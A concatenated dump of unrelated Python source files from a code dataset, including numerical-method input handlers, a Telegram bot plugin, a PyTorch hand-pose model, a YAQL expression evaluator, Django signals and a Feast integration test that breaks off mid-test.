print(color_string(Color.RED, e))\n            print(color_string(Color.RED, f\"ERROR >> Invalid user input in index {i} method in list. Skipping.\"))\n    return valid_data\n\n\ndef _get_data_from_stdin():\n    data = []\n    while True:\n        data.append(dict())\n        data[len(data) - 1][\"method\"] = _get_data_from_stdin_method()\n        method = method_dict[data[len(data) - 1][\"method\"]][0]\n        data[len(data) - 1][\"equation\"], var_list = _get_data_from_stdin_equation(method)\n        data[len(data) - 1][\"data\"] = _get_data_from_stdin_data(var_list, method)\n        data[len(data) - 1][\"var_list\"] = var_list\n        if (input(\"Finish input? Y/N: \").strip().lower() == \"y\"):\n            break\n    return data\n\n\ndef _get_data_from_stdin_method():\n    method_dict_keys = list(method_dict.keys())\n    for i in range(len(method_dict_keys)):\n        print(f\"{i + 1}) {method_dict[method_dict_keys[i]][1]}\")\n    while True:\n        try:\n            number = int(input(\"Choose the method number: \")) - 1\n            if not (0 <= number < len(method_dict_keys)):\n                raise ValueError()\n            break\n        except ValueError:\n            print(color_string(Color.RED, \"ERROR >> Invalid user input. Try again.\"))\n    return method_dict_keys[number]\n\n\ndef _get_data_from_stdin_equation(function):\n    var_set = set()\n    equation_list = list()\n\n    if (function == methods.simple_iteration):\n        while True:\n            try:\n                count = int(input(\"Enter the number of equations: \"))\n                if (count <= 0):\n                    raise ValueError()\n                break\n            except ValueError:\n                print(color_string(Color.RED, \"ERROR >> Invalid user input. Try again.\"))\n    else:\n        count = 1\n\n    for _ in range(count):\n        while True:\n            try:\n                node, var_list = parse.parse_expression(input(\"Equation: \").strip())\n                equation_list.append(node)\n                current_set = var_set | set(var_list)\n                if (len(current_set) > count):\n                    raise ValueError(\"Too many variables, try again.\")\n                var_set = current_set\n                break\n            except ParseException as e:\n                print(color_string(Color.RED, e))\n                print(color_string(Color.RED, \"ERROR >> Invalid user input. 
Try again.\"))\n except ValueError as e:\n print(e)\n return (equation_list, list(var_set))\n\n\ndef _get_data_from_stdin_data(var_list: list, function):\n _get_data_from_stdin_data_description()\n data = {}\n # iterations\n while True:\n try:\n iterations = input(\"Enter 'iterations' or blank: \")\n if (iterations.strip() == ''):\n break\n iterations = int(iterations)\n if (iterations < 0):\n raise ValueError()\n data[\"iterations\"] = iterations\n break\n except ValueError:\n print(color_string(Color.RED, \"ERROR >> Invalid user input. Try again.\"))\n # range_min\n while True:\n try:\n range_min = input(\"Enter 'range_min' or blank: \")\n if (range_min.strip() == ''):\n break\n range_min = float(range_min)\n data[\"range_min\"] = range_min\n break\n except ValueError:\n print(color_string(Color.RED, \"ERROR >> Invalid user input. Try again.\"))\n # range_max\n while True:\n try:\n range_max = input(\"Enter 'range_max' or blank: \")\n if (range_max.strip() == ''):\n break\n range_max = float(range_max)\n data[\"range_max\"] = range_max\n break\n except ValueError:\n print(color_string(Color.RED, \"ERROR >> Invalid user input\"))\n # x_0\n if (function == methods.tangent or function == methods.simple_iteration):\n for i in range(len(var_list)):\n while True:\n try:\n var_value = float(input(f\"Enter the value for '{var_list[i]}: '\"))\n data[var_list[i]] = var_value\n break\n except ValueError:\n print(color_string(Color.RED, \"ERROR >> Invalid user input. Try again.\"))\n return data\n\n\ndef _get_data_from_stdin_data_description():\n print(\"Additional arguments: \")\n print(\"-\" * 100)\n print(\"iterations (int) - count of iterations for the method\")\n print(\"range_min (float) - minimum value of border\")\n print(\"range_max (float) - maximum value of border\")\n print(\"x_0 (dict) - values of arguments for first computation\")\n print(\"-\" * 100)\n print()\n","sub_path":"Year-2/Computational-math/src/labs/lab_2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"204171881","text":"''' List of constants necessary for the project. 
'''\n\n# Name of the Slack bot.\nBOT_NAME = 'queuebot'\n# Command to list the available commands and how to use them.\nHELP_COMMAND = \"/help\"\n# Command to create/modify the queue.\nSET_QUEUE_COMMAND = \"/set\"\n# Command to cancel current queue.\nCANCEL_QUEUE_COMMAND = \"/cancel\"\n# Command to dequeue an item.\nCALL_QUEUE_COMMAND = \"/next\"\n# Delay between rtm reads.\nREAD_WEBSOCKET_DELAY = 1\n","sub_path":"constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
+{"seq_id":"493046029","text":"\"\"\"\n@author : Jeevesh Juneja \n(https://github.com/Jeevesh8/)\n\"\"\"\nimport os\nimport pickle\nimport fileinput\n\n\ndef write_files(device_feed_dic=None, initial_device_states=None) :\n    if device_feed_dic is not None :\n        with open('device_feed_dic.pkl', 'wb+') as f :\n            pickle.dump(device_feed_dic, f)\n    if initial_device_states is not None :\n        with open('initial_device_states.pkl', 'wb+') as f :\n            pickle.dump(initial_device_states, f) \n\ndef read_files() :\n    with open('device_feed_dic.pkl', 'rb') as f :\n        device_feed_dic = pickle.load(f)\n    with open('initial_device_states.pkl', 'rb') as f :\n        initial_device_states = pickle.load(f)\n    return device_feed_dic, initial_device_states \n\n\ndef update_device_feed_dic(device_name, new_feed_number) :\n    ''' When shifting device from one switch-board to another'''\n    assert(new_feed_number<=int(os.environ.get('N_FEEDS')))\n    device_feed_dic[device_name] = new_feed_number\n\n\ndef add_new_device(new_device_name, new_feed_number, write=1) :\n    assert(new_device_name not in device_feed_dic)\n    device_feed_dic[new_device_name] = new_feed_number\n    initial_device_states[new_device_name] = 0\n    if write :\n        write_files(device_feed_dic, initial_device_states)\n    \ndef make_new_dic(files=None) :\n    '''\n    Input any file/stdin having \"<device_name>:<feed_number>:<0/1>\" in each line.(No space on either side of ':')\n    <feed_number> must be element of [0,N_FEEDS-1]; <0/1> according to whether device is off or on initially.\n    Makes new dictionary of format {'device_name' : feed_number}\n    feed_number is string in final dictionary.\n    ''' \n    # rebind the module-level maps so add_new_device() mutates the same dicts\n    global device_feed_dic, initial_device_states\n    device_feed_dic = {}\n    initial_device_states = {}\n    print('Enter <device_name>:<feed_number>:<0/1> values')\n    for line in fileinput.input(files=files) :\n        line = line.rstrip()\n        if line=='000' : break\n        new_device_name, new_feed_number, initial_state = line.split(':')\n        add_new_device(new_device_name, new_feed_number, write=0)\n        initial_device_states[new_device_name] = int(initial_state)\n    \n    write_files(device_feed_dic, initial_device_states)\n    return device_feed_dic, initial_device_states\n\n\n# Load the saved maps if they exist, otherwise build them interactively.\n# This must run after the function definitions above so make_new_dic is defined.\ntry :\n    device_feed_dic, initial_device_states = read_files() \nexcept FileNotFoundError :\n    device_feed_dic, initial_device_states = make_new_dic()","sub_path":"device_feed_map.py","file_name":"device_feed_map.py","file_ext":"py","file_size_in_byte":2352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
+{"seq_id":"451014144","text":"\"\"\"Model class template\r\n\r\nThis module provides a template for users to implement custom models.\r\nYou can specify '--model template' to use this model.\r\nThe class name should be consistent with both the filename and its model option.\r\nThe filename should be <dataset_mode>_dataset.py\r\nThe class name should be <DatasetMode>Dataset.py\r\nIt implements a simple image-to-image translation baseline based on regression loss.\r\nGiven input-output pairs (data_A, data_B), it learns a network netG that can minimize the following L1 loss:\r\n    
min_<netG> ||netG(data_A) - data_B||_1\r\nYou need to implement the following functions:\r\n    <modify_commandline_options>: Add model-specific options and rewrite default values for existing options.\r\n    <__init__>: Initialize this model class.\r\n    <set_input>: Unpack input dataset and perform dataset pre-processing.\r\n    <forward>: Run forward pass. This will be called by both <optimize_parameters> and <test>.\r\n    <optimize_parameters>: Update network weights; it will be called in every training iteration.\r\n\"\"\"\r\nimport torch\r\nfrom .base_model import BaseModel\r\nfrom . import networks\r\nimport numpy as np\r\nimport apex\r\nfrom apex import amp\r\n\r\n# Hand Pose Module 3-D\r\nclass hpm3dModel(BaseModel):\r\n    @staticmethod\r\n    def modify_commandline_options(parser, is_train=True):\r\n        \"\"\"Add new model-specific options and rewrite default values for existing options.\r\n\r\n        Parameters:\r\n            parser -- the option parser\r\n            is_train -- if it is training phase or test phase. You can use this flag to add training-specific or test-specific options.\r\n\r\n        Returns:\r\n            the modified parser.\r\n        \"\"\"\r\n        parser.add_argument(\"--data_mode\", type=str, default='hpm3d')\r\n        parser.add_argument(\"--num_loss\", type=int, default=1)\r\n        return parser\r\n\r\n    def __init__(self, opt):\r\n        \"\"\"Initialize this model class.\r\n\r\n        Parameters:\r\n            opt -- training/test options\r\n\r\n        A few things can be done here.\r\n        - (required) call the initialization function of BaseModel\r\n        - define loss function, visualization images, model names, and optimizers\r\n        \"\"\"\r\n        # Hpm2d.__init__(self, opt) # call the initialization method of BaseModel\r\n        # specify the training losses you want to print out. The program will call base_model.get_current_losses to plot the losses to the console and save them to the disk.\r\n        super().__init__(opt)\r\n        self.loss_names = ['L_z', 'null']\r\n        # specify the images you want to save and display. The program will call base_model.get_current_visuals to save and display these images.\r\n        self.visual_names = []\r\n        # specify the models you want to save to the disk. The program will call base_model.save_networks and base_model.load_networks to save and load networks.\r\n        # you can use opt.isTrain to specify different behaviors for training and test. For example, some networks will not be used during test, and you don't need to load them.\r\n        self.model_names = ['Hpm3d']\r\n\r\n        self.loss_null = torch.tensor(0).to(self.device)\r\n        # define networks; you can use opt.isTrain to specify different behaviors for training and test.\r\n        self.optimizer = torch.optim.Adam if not self.opt.distributed else apex.optimizers.FusedAdam\r\n\r\n        self.networkFactory = networks.NetworkInitializer(networks=['hpm3d'],\r\n                                                          optimizers={self.optimizer: 'hpm3d'},\r\n                                                          options=opt)\r\n\r\n        if self.isTrain:  # only defined during training time\r\n            # define your loss functions. You can use losses provided by torch.nn such as torch.nn.L1Loss.\r\n            # We also provide a GANLoss class \"networks.GANLoss\". self.criterionGAN = networks.GANLoss().to(self.device)\r\n            self.criterionLoss = torch.nn.SmoothL1Loss()\r\n            [self.netHpm3d], [self.optimizer] = self.networkFactory()\r\n\r\n            # define and initialize optimizers. You can define one optimizer for each network.\r\n            # If two networks are updated at the same time, you can use itertools.chain to group them. 
See cycle_gan_model.py for an example.\r\n            self.optimizers = [self.optimizer]\r\n            # Our program will automatically call <model.setup> to define schedulers, load networks, and print networks\r\n        else:\r\n            [self.netHpm3d], _ = self.networkFactory()\r\n\r\n\r\n    def set_input(self, input):\r\n        \"\"\"Unpack input dataset from the dataloader and perform necessary pre-processing steps.\r\n\r\n        Parameters:\r\n            input: a dictionary that contains the dataset itself and its metadata information.\r\n        \"\"\"\r\n\r\n        self.heatmaps = input['A'].to(self.device) # there are 21\r\n        self.ground_truth = torch.squeeze(input['B'].to(self.device), dim=-1)\r\n\r\n    def forward(self):\r\n        \"\"\"Run forward pass. This will be called by both functions <optimize_parameters> and <test>.\"\"\"\r\n        self.output = self.netHpm3d(self.heatmaps) # generate prediction and loss\r\n\r\n    def backward(self):\r\n        \"\"\"\r\n        Calculate losses, gradients, and update network weights.\r\n        In DGGAN, this loss is L_2D, computed with a simple MSE loss.\r\n        The authors amplify this loss by 100 without mentioning it.\r\n\r\n        \"\"\"\r\n        self.loss_L_z = self.criterionLoss(self.output, self.ground_truth) * 10\r\n        self.loss_backward(self.loss_L_z, self.optimizer)\r\n\r\n    def optimize_parameters(self):\r\n        \"\"\"Update network weights; it will be called in every training iteration.\"\"\"\r\n        self.forward()\r\n        self.optimizer.zero_grad()\r\n        self.backward()\r\n        self.optimizer.step()\r\n","sub_path":"hand_pose_estimators/CVPR2020_hpm3d/models/hpm3d_model.py","file_name":"hpm3d_model.py","file_ext":"py","file_size_in_byte":5730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
+{"seq_id":"530100909","text":"# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport inspect\nimport logging\nimport re\nimport six\n\nimport yaql\nimport 
yaql.language.exceptions as yaql_exc\n\nfrom orquesta import exceptions as exc\nfrom orquesta.expressions import base\nfrom orquesta.expressions.functions import base as functions\nfrom orquesta.utils import expression as utils\n\n\nLOG = logging.getLogger(__name__)\n\n\ndef register_functions(ctx):\n catalog = functions.load()\n\n for name, func in six.iteritems(catalog):\n ctx.register_function(func, name=name)\n\n return catalog\n\n\nclass YaqlGrammarException(exc.ExpressionGrammarException):\n pass\n\n\nclass YaqlEvaluationException(exc.ExpressionEvaluationException):\n pass\n\n\nclass YAQLEvaluator(base.Evaluator):\n _type = 'yaql'\n _delimiter = '<%>'\n _regex_pattern = '<%.*?%>'\n _regex_parser = re.compile(_regex_pattern)\n\n _regex_dot_pattern = '[a-zA-Z0-9_\\'\"\\.\\[\\]\\(\\)]*'\n _regex_ctx_pattern_1 = 'ctx\\(\\)\\.%s' % _regex_dot_pattern\n _regex_ctx_pattern_2 = 'ctx\\([\\'|\"]?{0}[\\'|\"]?\\)[\\.{0}]?'.format(_regex_dot_pattern)\n _regex_var_pattern = '.*?(%s|%s).*?' % (_regex_ctx_pattern_1, _regex_ctx_pattern_2)\n _regex_var_parser = re.compile(_regex_var_pattern)\n\n _regex_dot_extract = '([a-zA-Z0-9_\\-]*)'\n _regex_ctx_extract_1 = 'ctx\\(\\)\\.%s' % _regex_dot_extract\n _regex_ctx_extract_2 = 'ctx\\([\\'|\"]?%s(%s)' % (_regex_dot_extract, _regex_dot_pattern)\n _regex_var_extracts = ['%s\\.?' % _regex_ctx_extract_1, '%s\\.?' % _regex_ctx_extract_2]\n\n _engine = yaql.language.factory.YaqlFactory().create()\n _root_ctx = yaql.create_context()\n _custom_functions = register_functions(_root_ctx)\n\n @classmethod\n def contextualize(cls, data):\n ctx = cls._root_ctx.create_child_context()\n ctx['__vars'] = data or {}\n ctx['__flow'] = ctx['__vars'].get('__flow')\n ctx['__current_task'] = ctx['__vars'].get('__current_task')\n\n return ctx\n\n @classmethod\n def get_statement_regex(cls):\n return cls._regex_pattern\n\n @classmethod\n def has_expressions(cls, text):\n exprs = cls._regex_parser.findall(text)\n\n return exprs is not None and len(exprs) > 0\n\n @classmethod\n def get_var_extraction_regexes(cls):\n return cls._regex_var_extracts\n\n @classmethod\n def validate(cls, text):\n if not isinstance(text, six.string_types):\n raise ValueError('Text to be evaluated is not typeof string.')\n\n errors = []\n\n for expr in cls._regex_parser.findall(text):\n try:\n cls._engine(cls.strip_delimiter(expr))\n except (yaql_exc.YaqlException, ValueError, TypeError) as e:\n errors.append(utils.format_error(cls._type, expr, e))\n\n return errors\n\n @classmethod\n def evaluate(cls, text, data=None):\n if not isinstance(text, six.string_types):\n raise ValueError('Text to be evaluated is not typeof string.')\n\n if data and not isinstance(data, dict):\n raise ValueError('Provided data is not typeof dict.')\n\n output = text\n exprs = cls._regex_parser.findall(text)\n ctx = cls.contextualize(data)\n\n try:\n for expr in exprs:\n stripped = cls.strip_delimiter(expr)\n result = cls._engine(stripped).evaluate(context=ctx)\n\n if inspect.isgenerator(result):\n result = list(result)\n\n if isinstance(result, six.string_types):\n result = cls.evaluate(result, data)\n\n if len(exprs) > 1 or len(output) > len(expr):\n output = output.replace(expr, str(result))\n else:\n output = result\n\n except KeyError as e:\n raise YaqlEvaluationException(\n \"Unable to resolve key '%s' in expression '%s' from context.\" %\n (str(getattr(e, 'message', e)).strip(\"'\"), expr)\n )\n except (yaql_exc.YaqlException, ValueError, TypeError) as e:\n raise YaqlEvaluationException(str(getattr(e, 'message', 
e)).strip(\"'\"))\n\n return output\n\n @classmethod\n def extract_vars(cls, text):\n if not isinstance(text, six.string_types):\n raise ValueError('Text to be evaluated is not typeof string.')\n\n variables = []\n\n for expr in cls._regex_parser.findall(text):\n variables.extend(cls._regex_var_parser.findall(expr))\n\n return sorted(list(set(variables)))\n","sub_path":"orquesta/expressions/yql.py","file_name":"yql.py","file_ext":"py","file_size_in_byte":4991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"106618792","text":"###############################################################################\n# file: ex_03_get_system_info.py\n#\n# Connect to the Modem Abstraction Layer and access system and connection info\n###############################################################################\nimport iot_mal # Import the Modem Abstraction Layer (MAL) API module\n\n###############################################################################\n# function: parse_state(state)\n#\n# Parses the connection state value and returns descriptive string\n###############################################################################\ndef parse_state(state):\n if state == 0:\n ret = 'Disconnected'\n elif state == 1:\n ret = 'Disconnecting'\n elif state == 2:\n ret = 'Connecting'\n elif state == 3:\n ret = 'Connected'\n elif state == 4:\n ret = 'Disconnected, and PIN locked'\n elif state == 5:\n ret = 'Disconnected, and SIM removed'\n return ret\n\n###############################################################################\n# Main code\n###############################################################################\n\n# Setup the MAL and data connection\nnetwork_handler = iot_mal.network() # Connect to MAL.network\nnetwork_handler.set_connection_mode(\n 1, # Mode: 0 - Always, 1 - On-demand\n 10, # On-demand Timeout: Disconnect in mins if no access\n 2) # Manual Mode: 0 - Disconnect, 1 - Connect (Always/on-demand),\n # 2 - Connect once\nsystem_handler = iot_mal.system() # Connect to MAL.system\n\n# Print out system information\nfirm = system_handler.get_firmware_version().get('version')\nimei = system_handler.get_imei().get('imei')\nimsi = system_handler.get_imsi().get('imsi')\niccid = system_handler.get_iccid().get('iccid')\n\nprint('System Information')\nprint('------------------')\nprint('Firmware version: ' + firm)\nprint('IMEI : ' + imei)\nprint('IMSI : ' + imsi)\nprint('ICCID : ' + iccid)\n\n# Print out connection information\nstatus = network_handler.get_connection_status()\n\nprint('\\nConnection Information')\nprint( '----------------------')\nprint('Connection State: ' + parse_state(status.get('state')))\nprint('Connection Time : ' + status.get('connection_time'))\nprint('Radio Mode : ' + str(status.get('radio_mode')) + 'G ' + status.get('data_bearer_tech'))\nprint('My IP address : ' + status.get('ip'))\n\n# =============================================================================\n# Copyright (c) 2018, AT&T (R)\n#\n# www.att.com \n# \n# Licensed under the Apache License, Version 2.0 (the \"License\"); \n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, \n# software distributed under the License is distributed on an \n# \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, \n# either express or implied. 
See the License for the specific \n# language governing permissions and limitations under the License.\n# =============================================================================","sub_path":"Chapter_05/ex_03_get_system_info.py","file_name":"ex_03_get_system_info.py","file_ext":"py","file_size_in_byte":3364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"340451386","text":"import config\nimport requests\nimport re\n\nbot = config.bot\nsudos = config.sudoers\nlogs = config.logs\nbot_username = config.bot_username\n\n\ndef send_to_hastebin(text):\n post = requests.post(\"https://hastebin.com/documents\", data=text.encode('utf-8'))\n return \"https://hastebin.com/\" + post.json()[\"key\"]\n\n\ndef diversos(msg):\n if msg.get('text'):\n\n if msg['text'].startswith('/echo ') or msg['text'].startswith('!echo '):\n if msg.get('reply_to_message'):\n reply_id = msg['reply_to_message']['message_id']\n else:\n reply_id = None\n bot.sendMessage(msg['chat']['id'], msg['text'][6:],\n reply_to_message_id=reply_id)\n return True\n\n\n elif msg['text'].startswith('/mark ') or msg['text'].startswith('!mark '):\n if msg.get('reply_to_message'):\n reply_id = msg['reply_to_message']['message_id']\n else:\n reply_id = None\n bot.sendMessage(msg['chat']['id'], msg['text'][6:], 'markdown',\n reply_to_message_id=reply_id)\n return True\n\n\n elif msg['text'].startswith('/bug') or msg['text'].startswith('!bug'):\n text = msg['text'][5:]\n if text == '' or text == bot_username:\n bot.sendMessage(msg['chat']['id'], '''*Uso:* `/bug ` - _Reporta erro/bug para minha equipe_\n obs.: Mal uso há possibilidade de ID\\_ban''', 'markdown',\n reply_to_message_id=msg['message_id'])\n else:\n bot.sendMessage(logs, '''\n{} reportou um bug\n\nID: {}\nMensagem: {}'''.format(msg['from']['id'],\n msg['from']['first_name'],\n msg['from']['id'],\n text), 'HTML')\n bot.sendMessage(msg['chat']['id'], 'O bug foi reportado com sucesso para a minha equipe!',\n reply_to_message_id=msg['message_id'])\n\n\n elif msg['text'].startswith('/html ') or msg['text'].startswith('!html '):\n if msg.get('reply_to_message'):\n reply_id = msg['reply_to_message']['message_id']\n else:\n reply_id = None\n bot.sendMessage(msg['chat']['id'], msg['text'][6:], 'html',\n reply_to_message_id=reply_id)\n return True\n\n\n elif msg['text'].startswith('/text ') or msg['text'].startswith('!text '):\n string = ''\n text = msg['text'][6:]\n if msg.get('reply_to_message'):\n reply_id = msg['reply_to_message']['message_id']\n else:\n reply_id = None\n sent = bot.sendMessage(msg['chat']['id'], '|', 'html',\n reply_to_message_id=reply_id)\n for char in text:\n string = string + char\n bot.editMessageText((msg['chat']['id'], sent['message_id']), ''+string+'', 'html')\n bot.editMessageText((msg['chat']['id'], sent['message_id']), ''+string+'|', 'html')\n bot.editMessageText((msg['chat']['id'], sent['message_id']), ''+msg['text'][6:]+'', 'html')\n return True\n\n\n elif msg['text'].startswith('/request ') or msg['text'].startswith('!request '):\n if re.match(r'^(https?:\\/\\/)', msg['text'][9:]):\n text = msg['text'][9:]\n else:\n text = 'http://'+msg['text'][9:]\n try:\n res = requests.get(text).text\n except Exception as e:\n return bot.sendMessage(msg['chat']['id'], str(e),\n reply_to_message_id=msg['message_id'])\n if len(res) > 4000:\n res = send_to_hastebin(res)\n bot.sendMessage(msg['chat']['id'], '*Conteúdo:*\\n`{}`'.format(res), 'markdown',\n reply_to_message_id=msg['message_id'])\n return True\n\n\n elif 
msg['text'].startswith('/suco'):\n            if msg['from']['id'] in sudos:\n                l = '✅'\n            else:\n                l = '❌'\n            bot.sendMessage(msg['chat']['id'], l + '🍹',\n                            reply_to_message_id=msg['message_id'])\n\n\n        elif msg['text'].lower() == 'rt' and msg.get('reply_to_message'):\n            if msg['reply_to_message']['text'].lower() != 'rt':\n                if not re.match('🔃 .* retweeted:\\n\\n👤 .*', msg['reply_to_message']['text']):\n                    bot.sendMessage(msg['chat']['id'], '''🔃 {} retweeted:\n\n👤 {}: {}'''.format(msg['from']['first_name'], msg['reply_to_message']['from']['first_name'],\n                    msg['reply_to_message']['text']), 'HTML',\n                                    reply_to_message_id=msg['message_id'])\n            return True\n","sub_path":"plugins/diversos.py","file_name":"diversos.py","file_ext":"py","file_size_in_byte":4964,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
+{"seq_id":"299062424","text":"# -*- coding: ISO-8859-1 -*-\r\nfrom django.db.models.signals import post_save\r\n\r\ndef add_historico_oportunidade(sender, instance, signal, created, **kwargs):\r\n    from tsm.oportunidade.models.historico import Historico\r\n    oportunidadeHistorico = Historico(\r\n        oportunidade=instance,\r\n        nome_usuario_add=instance.criador.first_name+' '+instance.criador.last_name,\r\n        nome_situacao=instance.situacao.nome,\r\n        nome_tipotemperatura = instance.tipotemperatura.nome,\r\n        nome_responsavel = instance.responsavel.first_name+' '+instance.responsavel.last_name,\r\n        nome_lider = instance.lider.first_name+' '+instance.lider.last_name,\r\n        valor = instance.valor,\r\n        ponderado = instance.ponderado,\r\n        temperatura_auto = instance.temperatura_auto,\r\n        dtFechamento = instance.dtFechamento,\r\n        obs = instance.obs,\r\n        dtFechado = instance.dtFechado,\r\n    )\r\n\r\n    if instance.arquitetos:\r\n        arquitetos_nome = []\r\n        for arquiteto in instance.arquitetos.all():\r\n            arquitetos_nome.append(arquiteto.first_name)\r\n\r\n        oportunidadeHistorico.nome_arquitetos = ', '.join(arquitetos_nome)\r\n\r\n    if instance.gpp:\r\n        oportunidadeHistorico.nome_gpp = instance.gpp.first_name + ' ' + instance.gpp.last_name\r\n\r\n    if instance.produto:\r\n        oportunidadeHistorico.nome_produto=instance.produto.nome\r\n\r\n    oportunidadeHistorico.save()\r\n\r\ndef add_historico_resposta(sender, instance, signal, created, **kwargs):\r\n    from tsm.oportunidade.models.historicoresposta import HistoricoResposta\r\n    respostaHistorico = HistoricoResposta(\r\n        oportunidade=instance.oportunidade,\r\n        nome_usuario_add=instance.oportunidade.criador.first_name+' '+instance.oportunidade.criador.last_name,\r\n        questao_txt=instance.questao.pergunta,\r\n        resposta_txt='SIM' if instance.resposta else 'NAO',\r\n    )\r\n    respostaHistorico.save()\r\n\r\ndef update_ponderado_oportunidade(sender, instance, *args, **kwargs):\r\n    if instance.tipo not in ['G', 'P']:\r\n        oportunidades = instance.tipotemperatura_set.all()\r\n        oportunidades = oportunidades.filter(dtFechado__isnull=True)\r\n        for oportunidade in oportunidades:\r\n            oportunidade.ponderado = round(oportunidade.valor * (instance.perc/100),2)\r\n            oportunidade.save()\r\n    ","sub_path":"tsm/oportunidade/signals.py","file_name":"signals.py","file_ext":"py","file_size_in_byte":2325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
+{"seq_id":"30344846","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jan 8 09:52:15 2020\n\n@author: Jacobsen\n\"\"\"\n\nimport numpy as np\nimport cv2\nimport tensorflow as tf\n\nCATEGORIES = [\"Angry\", \"Fear\", \"Happy\", \"Sad\", \"Surprise\", 
\"Neutral\"]\n\n\ndef prepare(filepath):\n IMG_SIZE = 48 # 48 in txt-based\n new_array = cv2.resize(filepath, (IMG_SIZE, IMG_SIZE))\n return new_array.reshape(-1, IMG_SIZE, IMG_SIZE, 1)\n\n\nmodel = tf.keras.models.load_model(\"/Users/AlbertoK/Desktop/DTU/Januar2020/emotionalligent/dropoutCNN.model\")\n\n\nkey = cv2. waitKey(1)\nwebcam = cv2.VideoCapture(0)\n\nwhile True:\n try:\n check, frame = webcam.read()\n print(check) #prints true as long as the webcam is running\n print(frame) #prints matrix values of each framecd \n key = cv2.waitKey(1)\n \n grayFrame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n prediction = model.predict([prepare(grayFrame)])\n print(prediction) # will be a list in a list.\n \n text = CATEGORIES[np.where(prediction==np.max(prediction))[1][0]]\n print(text)\n \n font = cv2.FONT_HERSHEY_SIMPLEX\n scale = 1\n color = (0,0,0)\n thickness = cv2.FILLED\n \n cv2.putText(grayFrame, text, (200, 200), font, 1, color, thickness=2)\n cv2.imshow(\"Capturing\", grayFrame)\n \n if key == ord('q'):\n print(\"Turning off camera.\")\n webcam.release()\n print(\"Camera off.\")\n print(\"Program ended.\")\n cv2.destroyAllWindows()\n break\n \n except(KeyboardInterrupt):\n print(\"Turning off camera.\")\n webcam.release()\n print(\"Camera off.\")\n print(\"Program ended.\")\n cv2.destroyAllWindows()\n break\n\n\n\n","sub_path":"LivePredictor.py","file_name":"LivePredictor.py","file_ext":"py","file_size_in_byte":1771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"133222818","text":"from datetime import datetime, timedelta\n\nimport pandas as pd\nimport pytest\n\nfrom feast.infra.offline_stores.offline_store import RetrievalJob\nfrom feast.type_map import python_type_to_feast_value_type\nfrom feast.value_type import ValueType\nfrom tests.data.data_creator import create_dataset, get_feature_values_for_dtype\nfrom tests.integration.feature_repos.repo_configuration import (\n IntegrationTestRepoConfig,\n construct_test_environment,\n)\nfrom tests.integration.feature_repos.universal.data_sources.bigquery import (\n BigQueryDataSourceCreator,\n)\nfrom tests.integration.feature_repos.universal.entities import driver\nfrom tests.integration.feature_repos.universal.feature_views import driver_feature_view\n\n\ndef entity_feature_types_ids(entity_type: ValueType, feature_dtype: str):\n return f\"entity_type:{str(entity_type)}-feature_dtype:{feature_dtype}\"\n\n\nentity_type_feature_dtypes = [\n (ValueType.INT32, \"int32\"),\n (ValueType.INT64, \"int64\"),\n (ValueType.STRING, \"float\"),\n (ValueType.STRING, \"bool\"),\n]\nGCP_CONFIG = IntegrationTestRepoConfig(\n provider=\"gcp\",\n offline_store_creator=BigQueryDataSourceCreator,\n online_store=\"datastore\",\n)\n\n\n# TODO: change parametrization to allow for other providers aside from gcp\n@pytest.mark.integration\n@pytest.mark.parametrize(\n \"entity_type,feature_dtype\",\n entity_type_feature_dtypes,\n ids=[\n entity_feature_types_ids(entity_type, feature_dtype)\n for entity_type, feature_dtype in entity_type_feature_dtypes\n ],\n)\n@pytest.mark.parametrize(\n \"feature_is_list\", [False], ids=lambda v: f\"feature_is_list:{str(v)}\"\n)\ndef test_entity_inference_types_match(entity_type, feature_dtype, feature_is_list):\n with construct_test_environment(GCP_CONFIG) as environment:\n df = create_dataset(entity_type, feature_dtype, feature_is_list)\n data_source = environment.data_source_creator.create_data_source(\n df,\n destination_name=environment.feature_store.project,\n 
field_mapping={\"ts_1\": \"ts\"},\n )\n fv = create_feature_view(feature_dtype, feature_is_list, data_source)\n fs = environment.feature_store\n\n try:\n # Don't specify value type in entity to force inference\n entity = driver(value_type=ValueType.UNKNOWN)\n fs.apply([fv, entity])\n\n entities = fs.list_entities()\n entity_type_to_expected_inferred_entity_type = {\n ValueType.INT32: ValueType.INT64,\n ValueType.INT64: ValueType.INT64,\n ValueType.FLOAT: ValueType.DOUBLE,\n ValueType.STRING: ValueType.STRING,\n }\n for entity in entities:\n assert (\n entity.value_type\n == entity_type_to_expected_inferred_entity_type[entity_type]\n )\n finally:\n environment.data_source_creator.teardown()\n\n\n@pytest.mark.integration\n@pytest.mark.parametrize(\n \"entity_type,feature_dtype\",\n entity_type_feature_dtypes,\n ids=[\n entity_feature_types_ids(entity_type, feature_dtype)\n for entity_type, feature_dtype in entity_type_feature_dtypes\n ],\n)\n@pytest.mark.parametrize(\n \"feature_is_list\", [True, False], ids=lambda v: f\"feature_is_list:{str(v)}\"\n)\ndef 